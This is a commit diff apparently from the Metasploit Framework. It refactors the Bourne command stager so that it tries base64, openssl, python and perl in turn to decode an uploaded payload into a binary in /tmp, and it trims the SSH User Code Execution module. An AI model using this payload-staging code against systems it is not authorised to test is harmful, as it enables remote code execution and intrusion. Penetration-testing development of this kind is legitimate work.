Remove the DECODER option
Spencer McIntyre
parent
aceba9fc8a
commit
8b5a83c7f5
|
|
@ -1,7 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# $Id: cmdstager_bourne.rb
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/cmdstager'
|
||||
|
||||
|
|
@ -16,49 +13,9 @@ module Exploit::CmdStagerBourne
|
|||
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptEnum.new( 'DECODER', [ false, 'The decoding binary to use', 'auto', ['auto', 'base64', 'openssl', 'python', 'perl']]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def create_stager(exe)
|
||||
Rex::Exploitation::CmdStagerBourne.new(exe)
|
||||
end
|
||||
|
||||
def generate_cmdstager(opts = {}, pl = nil)
|
||||
available_decoders = ['base64', 'openssl', 'python', 'perl']
|
||||
opts.merge!({ :decoder => datastore['DECODER'] })
|
||||
|
||||
if opts[:decoder] == 'auto'
|
||||
if self.respond_to? :execute_command_with_feedback
|
||||
available_decoders.each do |bin|
|
||||
which_result = execute_command_with_feedback("which #{bin}", opts).to_s
|
||||
which_result = which_result.strip
|
||||
if which_result.split.length == 1 and which_result.end_with?(bin)
|
||||
opts[:decoder] = bin
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
if opts[:decoder] == 'auto'
|
||||
print_error("Could not detect an appropriate decoder, try setting the DECODER option")
|
||||
raise ArgumentError
|
||||
else
|
||||
print_status("Command Stager using auto-detected decoder: #{opts[:decoder]}")
|
||||
end
|
||||
end
|
||||
|
||||
if not available_decoders.include?(opts[:decoder])
|
||||
print_error("Decoder must be one of #{available_decoders.join(', ')}")
|
||||
raise ArgumentError
|
||||
end
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
# -*- coding: binary -*-
|
||||
# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $
|
||||
# $Id$
|
||||
#
|
||||
# All exploit mixins should be added to the list below
|
||||
#
|
||||
|
|
|
|||
|
|
@ -1,7 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# $Id: bourne.rb
|
||||
##
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
|
|
@ -21,6 +18,8 @@ class CmdStagerBourne < CmdStagerBase
|
|||
|
||||
def generate(opts = {})
|
||||
opts[:temp] = opts[:temp] || '/tmp/'
|
||||
opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
|
||||
opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
|
||||
super
|
||||
end
|
||||
|
||||
|
|
@ -67,18 +66,20 @@ class CmdStagerBourne < CmdStagerBase
|
|||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
case opts[:decoder]
|
||||
when 'base64'
|
||||
decoder = "base64 --decode #{@tempdir}#{@var_encoded}.b64"
|
||||
when 'openssl'
|
||||
decoder = "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64"
|
||||
when 'python'
|
||||
decoder = "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64"
|
||||
when 'perl'
|
||||
decoder = "perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
|
||||
decoders = [
|
||||
"base64 --decode #{@tempdir}#{@var_encoded}.b64",
|
||||
"openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64",
|
||||
"python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64",
|
||||
"perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
|
||||
]
|
||||
decoder_cmd = []
|
||||
decoders.each do |cmd|
|
||||
binary = cmd.split(' ')[0]
|
||||
decoder_cmd << "(which #{binary} >&2 && #{cmd})"
|
||||
end
|
||||
decoder << " > #{@tempdir}#{@var_decoded}.bin"
|
||||
[ decoder ]
|
||||
decoder_cmd = decoder_cmd.join(" || ")
|
||||
decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin"
|
||||
[ decoder_cmd ]
|
||||
end
|
||||
|
||||
def compress_commands(cmds, opts)
|
||||
|
|
|
|||
|
|
@ -1,3 +1,9 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'net/ssh'
|
||||
|
|
@ -12,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'SSH User Code Execution',
|
||||
'Version' => '',
|
||||
'Description' => %q{
|
||||
This module utilizes a stager to upload a base64 encoded
|
||||
binary which is then decoded, chmod'ed and executed from
|
||||
|
|
@ -88,16 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def execute_command_with_feedback(cmd, opts = {})
|
||||
begin
|
||||
Timeout.timeout(3) do
|
||||
feedback = self.ssh_socket.exec!("#{cmd}\n")
|
||||
return feedback
|
||||
end
|
||||
rescue ::Exception
|
||||
end
|
||||
end
|
||||
|
||||
def do_login(ip, user, pass, port)
|
||||
opt_hash = {
|
||||
:auth_methods => ['password', 'keyboard-interactive'],
|
||||
|
|
|
|||
Loading…
Reference in New Issue